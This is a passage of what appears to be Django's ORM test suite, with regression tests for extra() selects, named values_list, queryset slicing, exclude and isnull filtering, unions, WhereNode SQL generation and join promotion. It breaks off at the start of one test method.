def test_extra_select_params_values_order_in_extra(self):
# testing for 23259 issue
qs = Number.objects.extra(
select={'value_plus_x': 'num+%s'},
select_params=[1],
order_by=['value_plus_x'],
)
qs = qs.filter(num=72)
qs = qs.values('num')
self.assertSequenceEqual(qs, [{'num': 72}])
def test_extra_multiple_select_params_values_order_by(self):
# testing for 23259 issue
qs = Number.objects.extra(select={'value_plus_x': 'num+%s', 'value_minus_x': 'num-%s'}, select_params=(72, 72))
qs = qs.order_by('value_minus_x')
qs = qs.filter(num=1)
qs = qs.values('num')
self.assertSequenceEqual(qs, [])
def test_extra_values_list(self):
# testing for ticket 14930 issues
qs = Number.objects.extra(select={'value_plus_one': 'num+1'})
qs = qs.order_by('value_plus_one')
qs = qs.values_list('num')
self.assertSequenceEqual(qs, [(72,)])
def test_flat_extra_values_list(self):
# testing for ticket 14930 issues
qs = Number.objects.extra(select={'value_plus_one': 'num+1'})
qs = qs.order_by('value_plus_one')
qs = qs.values_list('num', flat=True)
self.assertSequenceEqual(qs, [72])
def test_field_error_values_list(self):
# see #23443
msg = "Cannot resolve keyword %r into field. Join on 'name' not permitted." % 'foo'
with self.assertRaisesMessage(FieldError, msg):
Tag.objects.values_list('name__foo')
def test_named_values_list_flat(self):
msg = "'flat' and 'named' can't be used together."
with self.assertRaisesMessage(TypeError, msg):
Number.objects.values_list('num', flat=True, named=True)
def test_named_values_list_bad_field_name(self):
msg = "Type names and field names must be valid identifiers: '1'"
with self.assertRaisesMessage(ValueError, msg):
Number.objects.extra(select={'1': 'num+1'}).values_list('1', named=True).first()
def test_named_values_list_with_fields(self):
qs = Number.objects.extra(select={'num2': 'num+1'}).annotate(Count('id'))
values = qs.values_list('num', 'num2', named=True).first()
self.assertEqual(type(values).__name__, 'Row')
self.assertEqual(values._fields, ('num', 'num2'))
self.assertEqual(values.num, 72)
self.assertEqual(values.num2, 73)
def test_named_values_list_without_fields(self):
qs = Number.objects.extra(select={'num2': 'num+1'}).annotate(Count('id'))
values = qs.values_list(named=True).first()
self.assertEqual(type(values).__name__, 'Row')
self.assertEqual(
values._fields,
('num2', 'id', 'num', 'other_num', 'another_num', 'id__count'),
)
self.assertEqual(values.num, 72)
self.assertEqual(values.num2, 73)
self.assertEqual(values.id__count, 1)
def test_named_values_list_expression_with_default_alias(self):
expr = Count('id')
values = Number.objects.annotate(id__count1=expr).values_list(expr, 'id__count1', named=True).first()
self.assertEqual(values._fields, ('id__count2', 'id__count1'))
def test_named_values_list_expression(self):
expr = F('num') + 1
qs = Number.objects.annotate(combinedexpression1=expr).values_list(expr, 'combinedexpression1', named=True)
values = qs.first()
self.assertEqual(values._fields, ('combinedexpression2', 'combinedexpression1'))
def test_named_values_pickle(self):
value = Number.objects.values_list('num', 'other_num', named=True).get()
self.assertEqual(value, (72, None))
self.assertEqual(pickle.loads(pickle.dumps(value)), value)
class QuerySetSupportsPythonIdioms(TestCase):
@classmethod
def setUpTestData(cls):
some_date = datetime.datetime(2014, 5, 16, 12, 1)
cls.articles = [
Article.objects.create(name=f'Article {i}', created=some_date)
for i in range(1, 8)
]
def get_ordered_articles(self):
return Article.objects.all().order_by('name')
def test_can_get_items_using_index_and_slice_notation(self):
self.assertEqual(self.get_ordered_articles()[0].name, 'Article 1')
self.assertSequenceEqual(
self.get_ordered_articles()[1:3],
[self.articles[1], self.articles[2]],
)
def test_slicing_with_steps_can_be_used(self):
self.assertSequenceEqual(
self.get_ordered_articles()[::2], [
self.articles[0],
self.articles[2],
self.articles[4],
self.articles[6],
]
)
def test_slicing_without_step_is_lazy(self):
with self.assertNumQueries(0):
self.get_ordered_articles()[0:5]
def test_slicing_with_tests_is_not_lazy(self):
with self.assertNumQueries(1):
self.get_ordered_articles()[0:5:3]
def test_slicing_can_slice_again_after_slicing(self):
self.assertSequenceEqual(
self.get_ordered_articles()[0:5][0:2],
[self.articles[0], self.articles[1]],
)
self.assertSequenceEqual(self.get_ordered_articles()[0:5][4:], [self.articles[4]])
self.assertSequenceEqual(self.get_ordered_articles()[0:5][5:], [])
# Some more tests!
self.assertSequenceEqual(
self.get_ordered_articles()[2:][0:2],
[self.articles[2], self.articles[3]],
)
self.assertSequenceEqual(
self.get_ordered_articles()[2:][:2],
[self.articles[2], self.articles[3]],
)
self.assertSequenceEqual(self.get_ordered_articles()[2:][2:3], [self.articles[4]])
# Using an offset without a limit is also possible.
self.assertSequenceEqual(
self.get_ordered_articles()[5:],
[self.articles[5], self.articles[6]],
)
def test_slicing_cannot_filter_queryset_once_sliced(self):
msg = 'Cannot filter a query once a slice has been taken.'
with self.assertRaisesMessage(TypeError, msg):
Article.objects.all()[0:5].filter(id=1)
def test_slicing_cannot_reorder_queryset_once_sliced(self):
msg = 'Cannot reorder a query once a slice has been taken.'
with self.assertRaisesMessage(TypeError, msg):
Article.objects.all()[0:5].order_by('id')
def test_slicing_cannot_combine_queries_once_sliced(self):
msg = 'Cannot combine queries once a slice has been taken.'
with self.assertRaisesMessage(TypeError, msg):
Article.objects.all()[0:1] & Article.objects.all()[4:5]
def test_slicing_negative_indexing_not_supported_for_single_element(self):
"""hint: inverting your ordering might do what you need"""
msg = 'Negative indexing is not supported.'
with self.assertRaisesMessage(ValueError, msg):
Article.objects.all()[-1]
def test_slicing_negative_indexing_not_supported_for_range(self):
"""hint: inverting your ordering might do what you need"""
msg = 'Negative indexing is not supported.'
with self.assertRaisesMessage(ValueError, msg):
Article.objects.all()[0:-5]
with self.assertRaisesMessage(ValueError, msg):
Article.objects.all()[-1:]
def test_invalid_index(self):
msg = 'QuerySet indices must be integers or slices, not str.'
with self.assertRaisesMessage(TypeError, msg):
Article.objects.all()['foo']
def test_can_get_number_of_items_in_queryset_using_standard_len(self):
self.assertEqual(len(Article.objects.filter(name__exact='Article 1')), 1)
def test_can_combine_queries_using_and_and_or_operators(self):
s1 = Article.objects.filter(name__exact='Article 1')
s2 = Article.objects.filter(name__exact='Article 2')
self.assertSequenceEqual(
(s1 | s2).order_by('name'),
[self.articles[0], self.articles[1]],
)
self.assertSequenceEqual(s1 & s2, [])
class WeirdQuerysetSlicingTests(TestCase):
@classmethod
def setUpTestData(cls):
Number.objects.create(num=1)
Number.objects.create(num=2)
Article.objects.create(name='one', created=datetime.datetime.now())
Article.objects.create(name='two', created=datetime.datetime.now())
Article.objects.create(name='three', created=datetime.datetime.now())
Article.objects.create(name='four', created=datetime.datetime.now())
food = Food.objects.create(name='spam')
Eaten.objects.create(meal='spam with eggs', food=food)
def test_tickets_7698_10202(self):
# People like to slice with '0' as the high-water mark.
self.assertQuerysetEqual(Article.objects.all()[0:0], [])
self.assertQuerysetEqual(Article.objects.all()[0:0][:10], [])
self.assertEqual(Article.objects.all()[:0].count(), 0)
msg = 'Cannot change a query once a slice has been taken.'
with self.assertRaisesMessage(TypeError, msg):
Article.objects.all()[:0].latest('created')
def test_empty_resultset_sql(self):
# ticket #12192
self.assertNumQueries(0, lambda: list(Number.objects.all()[1:1]))
def test_empty_sliced_subquery(self):
self.assertEqual(Eaten.objects.filter(food__in=Food.objects.all()[0:0]).count(), 0)
def test_empty_sliced_subquery_exclude(self):
self.assertEqual(Eaten.objects.exclude(food__in=Food.objects.all()[0:0]).count(), 1)
def test_zero_length_values_slicing(self):
n = 42
with self.assertNumQueries(0):
self.assertQuerysetEqual(Article.objects.values()[n:n], [])
self.assertQuerysetEqual(Article.objects.values_list()[n:n], [])
class EscapingTests(TestCase):
def test_ticket_7302(self):
# Reserved names are appropriately escaped
r_a = ReservedName.objects.create(name='a', order=42)
r_b = ReservedName.objects.create(name='b', order=37)
self.assertSequenceEqual(
ReservedName.objects.all().order_by('order'),
[r_b, r_a],
)
self.assertSequenceEqual(
ReservedName.objects.extra(select={'stuff': 'name'}, order_by=('order', 'stuff')),
[r_b, r_a],
)
class ToFieldTests(TestCase):
def test_in_query(self):
apple = Food.objects.create(name="apple")
pear = Food.objects.create(name="pear")
lunch = Eaten.objects.create(food=apple, meal="lunch")
dinner = Eaten.objects.create(food=pear, meal="dinner")
self.assertEqual(
set(Eaten.objects.filter(food__in=[apple, pear])),
{lunch, dinner},
)
def test_in_subquery(self):
apple = Food.objects.create(name="apple")
lunch = Eaten.objects.create(food=apple, meal="lunch")
self.assertEqual(
set(Eaten.objects.filter(food__in=Food.objects.filter(name='apple'))),
{lunch}
)
self.assertEqual(
set(Eaten.objects.filter(food__in=Food.objects.filter(name='apple').values('eaten__meal'))),
set()
)
self.assertEqual(
set(Food.objects.filter(eaten__in=Eaten.objects.filter(meal='lunch'))),
{apple}
)
def test_nested_in_subquery(self):
extra = ExtraInfo.objects.create()
author = Author.objects.create(num=42, extra=extra)
report = Report.objects.create(creator=author)
comment = ReportComment.objects.create(report=report)
comments = ReportComment.objects.filter(
report__in=Report.objects.filter(
creator__in=extra.author_set.all(),
),
)
self.assertSequenceEqual(comments, [comment])
def test_reverse_in(self):
apple = Food.objects.create(name="apple")
pear = Food.objects.create(name="pear")
lunch_apple = Eaten.objects.create(food=apple, meal="lunch")
lunch_pear = Eaten.objects.create(food=pear, meal="dinner")
self.assertEqual(
set(Food.objects.filter(eaten__in=[lunch_apple, lunch_pear])),
{apple, pear}
)
def test_single_object(self):
apple = Food.objects.create(name="apple")
lunch = Eaten.objects.create(food=apple, meal="lunch")
dinner = Eaten.objects.create(food=apple, meal="dinner")
self.assertEqual(
set(Eaten.objects.filter(food=apple)),
{lunch, dinner}
)
def test_single_object_reverse(self):
apple = Food.objects.create(name="apple")
lunch = Eaten.objects.create(food=apple, meal="lunch")
self.assertEqual(
set(Food.objects.filter(eaten=lunch)),
{apple}
)
def test_recursive_fk(self):
node1 = Node.objects.create(num=42)
node2 = Node.objects.create(num=1, parent=node1)
self.assertEqual(
list(Node.objects.filter(parent=node1)),
[node2]
)
def test_recursive_fk_reverse(self):
node1 = Node.objects.create(num=42)
node2 = Node.objects.create(num=1, parent=node1)
self.assertEqual(
list(Node.objects.filter(node=node2)),
[node1]
)
class IsNullTests(TestCase):
def test_primary_key(self):
custom = CustomPk.objects.create(name='pk')
null = Related.objects.create()
notnull = Related.objects.create(custom=custom)
self.assertSequenceEqual(Related.objects.filter(custom__isnull=False), [notnull])
self.assertSequenceEqual(Related.objects.filter(custom__isnull=True), [null])
def test_to_field(self):
apple = Food.objects.create(name="apple")
e1 = Eaten.objects.create(food=apple, meal="lunch")
e2 = Eaten.objects.create(meal="lunch")
self.assertSequenceEqual(
Eaten.objects.filter(food__isnull=False),
[e1],
)
self.assertSequenceEqual(
Eaten.objects.filter(food__isnull=True),
[e2],
)
class ConditionalTests(TestCase):
"""Tests whose execution depend on different environment conditions like
Python version or DB backend features"""
@classmethod
def setUpTestData(cls):
generic = NamedCategory.objects.create(name="Generic")
t1 = Tag.objects.create(name='t1', category=generic)
Tag.objects.create(name='t2', parent=t1, category=generic)
t3 = Tag.objects.create(name='t3', parent=t1)
Tag.objects.create(name='t4', parent=t3)
Tag.objects.create(name='t5', parent=t3)
def test_infinite_loop(self):
# If you're not careful, it's possible to introduce infinite loops via
# default ordering on foreign keys in a cycle. We detect that.
with self.assertRaisesMessage(FieldError, 'Infinite loop caused by ordering.'):
list(LoopX.objects.all()) # Force queryset evaluation with list()
with self.assertRaisesMessage(FieldError, 'Infinite loop caused by ordering.'):
list(LoopZ.objects.all()) # Force queryset evaluation with list()
# Note that this doesn't cause an infinite loop, since the default
# ordering on the Tag model is empty (and thus defaults to using "id"
# for the related field).
self.assertEqual(len(Tag.objects.order_by('parent')), 5)
# ... but you can still order in a non-recursive fashion among linked
# fields (the previous test failed because the default ordering was
# recursive).
self.assertQuerysetEqual(
LoopX.objects.all().order_by('y__x__y__x__id'),
[]
)
# When grouping without specifying ordering, we add an explicit "ORDER BY NULL"
# portion in MySQL to prevent unnecessary sorting.
@skipUnlessDBFeature('requires_explicit_null_ordering_when_grouping')
def test_null_ordering_added(self):
query = Tag.objects.values_list('parent_id', flat=True).order_by().query
query.group_by = ['parent_id']
sql = query.get_compiler(DEFAULT_DB_ALIAS).as_sql()[0]
fragment = "ORDER BY "
pos = sql.find(fragment)
self.assertEqual(sql.find(fragment, pos + 1), -1)
self.assertEqual(sql.find("NULL", pos + len(fragment)), pos + len(fragment))
def test_in_list_limit(self):
# The "in" lookup works with lists of 1000 items or more.
# The numbers amount is picked to force three different IN batches
# for Oracle, yet to be less than 2100 parameter limit for MSSQL.
numbers = list(range(2050))
max_query_params = connection.features.max_query_params
if max_query_params is None or max_query_params >= len(numbers):
Number.objects.bulk_create(Number(num=num) for num in numbers)
for number in [1000, 1001, 2000, len(numbers)]:
with self.subTest(number=number):
self.assertEqual(Number.objects.filter(num__in=numbers[:number]).count(), number)
class UnionTests(unittest.TestCase):
"""
Tests for the union of two querysets. Bug #12252.
"""
@classmethod
def setUpTestData(cls):
objectas = []
objectbs = []
objectcs = []
a_info = ['one', 'two', 'three']
for name in a_info:
o = ObjectA(name=name)
o.save()
objectas.append(o)
b_info = [('un', 1, objectas[0]), ('deux', 2, objectas[0]), ('trois', 3, objectas[2])]
for name, number, objecta in b_info:
o = ObjectB(name=name, num=number, objecta=objecta)
o.save()
objectbs.append(o)
c_info = [('ein', objectas[2], objectbs[2]), ('zwei', objectas[1], objectbs[1])]
for name, objecta, objectb in c_info:
o = ObjectC(name=name, objecta=objecta, objectb=objectb)
o.save()
objectcs.append(o)
def check_union(self, model, Q1, Q2):
filter = model.objects.filter
self.assertEqual(set(filter(Q1) | filter(Q2)), set(filter(Q1 | Q2)))
self.assertEqual(set(filter(Q2) | filter(Q1)), set(filter(Q1 | Q2)))
def test_A_AB(self):
Q1 = Q(name='two')
Q2 = Q(objectb__name='deux')
self.check_union(ObjectA, Q1, Q2)
def test_A_AB2(self):
Q1 = Q(name='two')
Q2 = Q(objectb__name='deux', objectb__num=2)
self.check_union(ObjectA, Q1, Q2)
def test_AB_ACB(self):
Q1 = Q(objectb__name='deux')
Q2 = Q(objectc__objectb__name='deux')
self.check_union(ObjectA, Q1, Q2)
def test_BAB_BAC(self):
Q1 = Q(objecta__objectb__name='deux')
Q2 = Q(objecta__objectc__name='ein')
self.check_union(ObjectB, Q1, Q2)
def test_BAB_BACB(self):
Q1 = Q(objecta__objectb__name='deux')
Q2 = Q(objecta__objectc__objectb__name='trois')
self.check_union(ObjectB, Q1, Q2)
def test_BA_BCA__BAB_BAC_BCA(self):
Q1 = Q(objecta__name='one', objectc__objecta__name='two')
Q2 = Q(objecta__objectc__name='ein', objectc__objecta__name='three', objecta__objectb__name='trois')
self.check_union(ObjectB, Q1, Q2)
class DefaultValuesInsertTest(TestCase):
def test_no_extra_params(self):
"""
Can create an instance of a model with only the PK field (#17056)."
"""
DumbCategory.objects.create()
class ExcludeTests(TestCase):
@classmethod
def setUpTestData(cls):
f1 = Food.objects.create(name='apples')
cls.f2 = Food.objects.create(name='oranges')
Eaten.objects.create(food=f1, meal='dinner')
cls.j1 = Job.objects.create(name='Manager')
cls.r1 = Responsibility.objects.create(description='Playing golf')
cls.j2 = Job.objects.create(name='Programmer')
cls.r2 = Responsibility.objects.create(description='Programming')
JobResponsibilities.objects.create(job=cls.j1, responsibility=cls.r1)
JobResponsibilities.objects.create(job=cls.j2, responsibility=cls.r2)
def test_to_field(self):
self.assertSequenceEqual(
Food.objects.exclude(eaten__meal='dinner'),
[self.f2],
)
self.assertSequenceEqual(
Job.objects.exclude(responsibilities__description='Playing golf'),
[self.j2],
)
self.assertSequenceEqual(
Responsibility.objects.exclude(jobs__name='Manager'),
[self.r2],
)
def test_ticket14511(self):
alex = Person.objects.get_or_create(name='Alex')[0]
jane = Person.objects.get_or_create(name='Jane')[0]
oracle = Company.objects.get_or_create(name='Oracle')[0]
google = Company.objects.get_or_create(name='Google')[0]
microsoft = Company.objects.get_or_create(name='Microsoft')[0]
intel = Company.objects.get_or_create(name='Intel')[0]
def employ(employer, employee, title):
Employment.objects.get_or_create(employee=employee, employer=employer, title=title)
employ(oracle, alex, 'Engineer')
employ(oracle, alex, 'Developer')
employ(google, alex, 'Engineer')
employ(google, alex, 'Manager')
employ(microsoft, alex, 'Manager')
employ(intel, alex, 'Manager')
employ(microsoft, jane, 'Developer')
employ(intel, jane, 'Manager')
alex_tech_employers = alex.employers.filter(
employment__title__in=('Engineer', 'Developer')).distinct().order_by('name')
self.assertSequenceEqual(alex_tech_employers, [google, oracle])
alex_nontech_employers = alex.employers.exclude(
employment__title__in=('Engineer', 'Developer')).distinct().order_by('name')
self.assertSequenceEqual(alex_nontech_employers, [google, intel, microsoft])
def test_exclude_reverse_fk_field_ref(self):
tag = Tag.objects.create()
Note.objects.create(tag=tag, note='note')
annotation = Annotation.objects.create(name='annotation', tag=tag)
self.assertEqual(Annotation.objects.exclude(tag__note__note=F('name')).get(), annotation)
def test_exclude_with_circular_fk_relation(self):
self.assertEqual(ObjectB.objects.exclude(objecta__objectb__name=F('name')).count(), 0)
def test_subquery_exclude_outerref(self):
qs = JobResponsibilities.objects.filter(
Exists(Responsibility.objects.exclude(jobs=OuterRef('job'))),
)
self.assertTrue(qs.exists())
self.r1.delete()
self.assertFalse(qs.exists())
def test_exclude_nullable_fields(self):
number = Number.objects.create(num=1, other_num=1)
Number.objects.create(num=2, other_num=2, another_num=2)
self.assertSequenceEqual(
Number.objects.exclude(other_num=F('another_num')),
[number],
)
self.assertSequenceEqual(
Number.objects.exclude(num=F('another_num')),
[number],
)
def test_exclude_multivalued_exists(self):
with CaptureQueriesContext(connection) as captured_queries:
self.assertSequenceEqual(
Job.objects.exclude(responsibilities__description='Programming'),
[self.j1],
)
self.assertIn('exists', captured_queries[0]['sql'].lower())
def test_exclude_subquery(self):
subquery = JobResponsibilities.objects.filter(
responsibility__description='bar',
) | JobResponsibilities.objects.exclude(
job__responsibilities__description='foo',
)
self.assertCountEqual(
Job.objects.annotate(
responsibility=subquery.filter(
job=OuterRef('name'),
).values('id')[:1]
),
[self.j1, self.j2],
)
def test_exclude_unsaved_o2o_object(self):
jack = Staff.objects.create(name='jack')
jack_staff = StaffUser.objects.create(staff=jack)
unsaved_object = Staff(name='jane')
self.assertIsNone(unsaved_object.pk)
self.assertSequenceEqual(StaffUser.objects.exclude(staff=unsaved_object), [jack_staff])
class ExcludeTest17600(TestCase):
"""
Some regressiontests for ticket #17600. Some of these likely duplicate
other existing tests.
"""
@classmethod
def setUpTestData(cls):
# Create a few Orders.
cls.o1 = Order.objects.create(pk=1)
cls.o2 = Order.objects.create(pk=2)
cls.o3 = Order.objects.create(pk=3)
# Create some OrderItems for the first order with homogeneous
# status_id values
cls.oi1 = OrderItem.objects.create(order=cls.o1, status=1)
cls.oi2 = OrderItem.objects.create(order=cls.o1, status=1)
cls.oi3 = OrderItem.objects.create(order=cls.o1, status=1)
# Create some OrderItems for the second order with heterogeneous
# status_id values
cls.oi4 = OrderItem.objects.create(order=cls.o2, status=1)
cls.oi5 = OrderItem.objects.create(order=cls.o2, status=2)
cls.oi6 = OrderItem.objects.create(order=cls.o2, status=3)
# Create some OrderItems for the second order with heterogeneous
# status_id values
cls.oi7 = OrderItem.objects.create(order=cls.o3, status=2)
cls.oi8 = OrderItem.objects.create(order=cls.o3, status=3)
cls.oi9 = OrderItem.objects.create(order=cls.o3, status=4)
def test_exclude_plain(self):
"""
This should exclude Orders which have some items with status 1
"""
self.assertSequenceEqual(
Order.objects.exclude(items__status=1),
[self.o3],
)
def test_exclude_plain_distinct(self):
"""
This should exclude Orders which have some items with status 1
"""
self.assertSequenceEqual(
Order.objects.exclude(items__status=1).distinct(),
[self.o3],
)
def test_exclude_with_q_object_distinct(self):
"""
This should exclude Orders which have some items with status 1
"""
self.assertSequenceEqual(
Order.objects.exclude(Q(items__status=1)).distinct(),
[self.o3],
)
def test_exclude_with_q_object_no_distinct(self):
"""
This should exclude Orders which have some items with status 1
"""
self.assertSequenceEqual(
Order.objects.exclude(Q(items__status=1)),
[self.o3],
)
def test_exclude_with_q_is_equal_to_plain_exclude(self):
"""
Using exclude(condition) and exclude(Q(condition)) should
yield the same QuerySet
"""
self.assertEqual(
list(Order.objects.exclude(items__status=1).distinct()),
list(Order.objects.exclude(Q(items__status=1)).distinct()))
def test_exclude_with_q_is_equal_to_plain_exclude_variation(self):
"""
Using exclude(condition) and exclude(Q(condition)) should
yield the same QuerySet
"""
self.assertEqual(
list(Order.objects.exclude(items__status=1)),
list(Order.objects.exclude(Q(items__status=1)).distinct()))
@unittest.expectedFailure
def test_only_orders_with_all_items_having_status_1(self):
"""
This should only return orders having ALL items set to status 1, or
those items not having any orders at all. The correct way to write
this query in SQL seems to be using two nested subqueries.
"""
self.assertQuerysetEqual(
Order.objects.exclude(~Q(items__status=1)).distinct(),
[self.o1],
)
class Exclude15786(TestCase):
"""Regression test for #15786"""
def test_ticket15786(self):
c1 = SimpleCategory.objects.create(name='c1')
c2 = SimpleCategory.objects.create(name='c2')
OneToOneCategory.objects.create(category=c1)
OneToOneCategory.objects.create(category=c2)
rel = CategoryRelationship.objects.create(first=c1, second=c2)
self.assertEqual(
CategoryRelationship.objects.exclude(
first__onetoonecategory=F('second__onetoonecategory')
).get(), rel
)
class NullInExcludeTest(TestCase):
@classmethod
def setUpTestData(cls):
NullableName.objects.create(name='i1')
NullableName.objects.create()
def test_null_in_exclude_qs(self):
none_val = '' if connection.features.interprets_empty_strings_as_nulls else None
self.assertQuerysetEqual(
NullableName.objects.exclude(name__in=[]),
['i1', none_val], attrgetter('name'))
self.assertQuerysetEqual(
NullableName.objects.exclude(name__in=['i1']),
[none_val], attrgetter('name'))
self.assertQuerysetEqual(
NullableName.objects.exclude(name__in=['i3']),
['i1', none_val], attrgetter('name'))
inner_qs = NullableName.objects.filter(name='i1').values_list('name')
self.assertQuerysetEqual(
NullableName.objects.exclude(name__in=inner_qs),
[none_val], attrgetter('name'))
# The inner queryset wasn't executed - it should be turned
# into subquery above
self.assertIs(inner_qs._result_cache, None)
@unittest.expectedFailure
def test_col_not_in_list_containing_null(self):
"""
The following case is not handled properly because
SQL's COL NOT IN (list containing null) handling is too weird to
abstract away.
"""
self.assertQuerysetEqual(
NullableName.objects.exclude(name__in=[None]),
['i1'], attrgetter('name'))
def test_double_exclude(self):
self.assertEqual(
list(NullableName.objects.filter(~~Q(name='i1'))),
list(NullableName.objects.filter(Q(name='i1'))))
self.assertNotIn(
'IS NOT NULL',
str(NullableName.objects.filter(~~Q(name='i1')).query))
class EmptyStringsAsNullTest(TestCase):
"""
Filtering on non-null character fields works as expected.
The reason for these tests is that Oracle treats '' as NULL, and this
can cause problems in query construction. Refs #17957.
"""
@classmethod
def setUpTestData(cls):
cls.nc = NamedCategory.objects.create(name='')
def test_direct_exclude(self):
self.assertQuerysetEqual(
NamedCategory.objects.exclude(name__in=['nonexistent']),
[self.nc.pk], attrgetter('pk')
)
def test_joined_exclude(self):
self.assertQuerysetEqual(
DumbCategory.objects.exclude(namedcategory__name__in=['nonexistent']),
[self.nc.pk], attrgetter('pk')
)
def test_21001(self):
foo = NamedCategory.objects.create(name='foo')
self.assertQuerysetEqual(
NamedCategory.objects.exclude(name=''),
[foo.pk], attrgetter('pk')
)
class ProxyQueryCleanupTest(TestCase):
def test_evaluated_proxy_count(self):
"""
Generating the query string doesn't alter the query's state
in irreversible ways. Refs #18248.
"""
ProxyCategory.objects.create()
qs = ProxyCategory.objects.all()
self.assertEqual(qs.count(), 1)
str(qs.query)
self.assertEqual(qs.count(), 1)
class WhereNodeTest(SimpleTestCase):
class DummyNode:
def as_sql(self, compiler, connection):
return 'dummy', []
class MockCompiler:
def compile(self, node):
return node.as_sql(self, connection)
def __call__(self, name):
return connection.ops.quote_name(name)
def test_empty_full_handling_conjunction(self):
compiler = WhereNodeTest.MockCompiler()
w = WhereNode(children=[NothingNode()])
with self.assertRaises(EmptyResultSet):
w.as_sql(compiler, connection)
w.negate()
self.assertEqual(w.as_sql(compiler, connection), ('', []))
w = WhereNode(children=[self.DummyNode(), self.DummyNode()])
self.assertEqual(w.as_sql(compiler, connection), ('(dummy AND dummy)', []))
w.negate()
self.assertEqual(w.as_sql(compiler, connection), ('NOT (dummy AND dummy)', []))
w = WhereNode(children=[NothingNode(), self.DummyNode()])
with self.assertRaises(EmptyResultSet):
w.as_sql(compiler, connection)
w.negate()
self.assertEqual(w.as_sql(compiler, connection), ('', []))
def test_empty_full_handling_disjunction(self):
compiler = WhereNodeTest.MockCompiler()
w = WhereNode(children=[NothingNode()], connector='OR')
with self.assertRaises(EmptyResultSet):
w.as_sql(compiler, connection)
w.negate()
self.assertEqual(w.as_sql(compiler, connection), ('', []))
w = WhereNode(children=[self.DummyNode(), self.DummyNode()], connector='OR')
self.assertEqual(w.as_sql(compiler, connection), ('(dummy OR dummy)', []))
w.negate()
self.assertEqual(w.as_sql(compiler, connection), ('NOT (dummy OR dummy)', []))
w = WhereNode(children=[NothingNode(), self.DummyNode()], connector='OR')
self.assertEqual(w.as_sql(compiler, connection), ('dummy', []))
w.negate()
self.assertEqual(w.as_sql(compiler, connection), ('NOT (dummy)', []))
def test_empty_nodes(self):
compiler = WhereNodeTest.MockCompiler()
empty_w = WhereNode()
w = WhereNode(children=[empty_w, empty_w])
self.assertEqual(w.as_sql(compiler, connection), ('', []))
w.negate()
with self.assertRaises(EmptyResultSet):
w.as_sql(compiler, connection)
w.connector = 'OR'
with self.assertRaises(EmptyResultSet):
w.as_sql(compiler, connection)
w.negate()
self.assertEqual(w.as_sql(compiler, connection), ('', []))
w = WhereNode(children=[empty_w, NothingNode()], connector='OR')
self.assertEqual(w.as_sql(compiler, connection), ('', []))
w = WhereNode(children=[empty_w, NothingNode()], connector='AND')
with self.assertRaises(EmptyResultSet):
w.as_sql(compiler, connection)
class QuerySetExceptionTests(SimpleTestCase):
def test_iter_exceptions(self):
qs = ExtraInfo.objects.only('author')
msg = "'ManyToOneRel' object has no attribute 'attname'"
with self.assertRaisesMessage(AttributeError, msg):
list(qs)
def test_invalid_order_by(self):
msg = (
"Cannot resolve keyword '*' into field. Choices are: created, id, "
"name"
)
with self.assertRaisesMessage(FieldError, msg):
Article.objects.order_by('*')
def test_invalid_order_by_raw_column_alias(self):
msg = (
"Cannot resolve keyword 'queries_author.name' into field. Choices "
"are: cover, created, creator, creator_id, id, modified, name, "
"note, note_id, tags"
)
with self.assertRaisesMessage(FieldError, msg):
Item.objects.values('creator__name').order_by('queries_author.name')
def test_invalid_queryset_model(self):
msg = 'Cannot use QuerySet for "Article": Use a QuerySet for "ExtraInfo".'
with self.assertRaisesMessage(ValueError, msg):
list(Author.objects.filter(extra=Article.objects.all()))
class NullJoinPromotionOrTest(TestCase):
@classmethod
def setUpTestData(cls):
cls.d1 = ModelD.objects.create(name='foo')
d2 = ModelD.objects.create(name='bar')
cls.a1 = ModelA.objects.create(name='a1', d=cls.d1)
c = ModelC.objects.create(name='c')
b = ModelB.objects.create(name='b', c=c)
cls.a2 = ModelA.objects.create(name='a2', b=b, d=d2)
def test_ticket_17886(self):
# The first Q-object is generating the match, the rest of the filters
# should not remove the match even if they do not match anything. The
# problem here was that b__name generates a LOUTER JOIN, then
# b__c__name generates join to c, which the ORM tried to promote but
# failed as that join isn't nullable.
q_obj = (
Q(d__name='foo') |
Q(b__name='foo') |
Q(b__c__name='foo')
)
qset = ModelA.objects.filter(q_obj)
self.assertEqual(list(qset), [self.a1])
# We generate one INNER JOIN to D. The join is direct and not nullable
# so we can use INNER JOIN for it. However, we can NOT use INNER JOIN
# for the b->c join, as a->b is nullable.
self.assertEqual(str(qset.query).count('INNER JOIN'), 1)
def test_isnull_filter_promotion(self):
qs = ModelA.objects.filter(Q(b__name__isnull=True))
self.assertEqual(str(qs.query).count('LEFT OUTER'), 1)
self.assertEqual(list(qs), [self.a1])
qs = ModelA.objects.filter(~Q(b__name__isnull=True))
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
self.assertEqual(list(qs), [self.a2])
qs = ModelA.objects.filter(~~Q(b__name__isnull=True))
self.assertEqual(str(qs.query).count('LEFT OUTER'), 1)
self.assertEqual(list(qs), [self.a1])
qs = ModelA.objects.filter(Q(b__name__isnull=False))
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
self.assertEqual(list(qs), [self.a2])
qs = ModelA.objects.filter(~Q(b__name__isnull=False))
self.assertEqual(str(qs.query).count('LEFT OUTER'), 1)
self.assertEqual(list(qs), [self.a1])
qs = ModelA.objects.filter(~~Q(b__name__isnull=False))
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
self.assertEqual(list(qs), [self.a2])
def test_null_join_demotion(self):
qs = ModelA.objects.filter(Q(b__name__isnull=False) & Q(b__name__isnull=True))
self.assertIn(' INNER JOIN ', str(qs.query))
qs = ModelA.objects.filter(Q(b__name__isnull=True) & Q(b__name__isnull=False))
self.assertIn(' INNER JOIN ', str(qs.query))
qs = ModelA.objects.filter(Q(b__name__isnull=False) | Q(b__name__isnull=True))
self.assertIn(' LEFT OUTER JOIN ', str(qs.query))
qs = ModelA.objects.filter(Q(b__name__isnull=True) | Q(b__name__isnull=False))
self.assertIn(' LEFT OUTER JOIN ', str(qs.query))
def test_ticket_21366(self):
n = Note.objects.create(note='n', misc='m')
e = ExtraInfo.objects.create(info='info', note=n)
a = Author.objects.create(name='Author1', num=1, extra=e)
Ranking.objects.create(rank=1, author=a)
r1 = Report.objects.create(name='Foo', creator=a)
r2 = Report.objects.create(name='Bar')
Report.objects.create(name='Bar', creator=a)
qs = Report.objects.filter(
Q(creator__ranking__isnull=True) |
Q(creator__ranking__rank=1, name='Foo')
)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 2)
self.assertEqual(str(qs.query).count(' JOIN '), 2)
self.assertSequenceEqual(qs.order_by('name'), [r2, r1])
def test_ticket_21748(self):
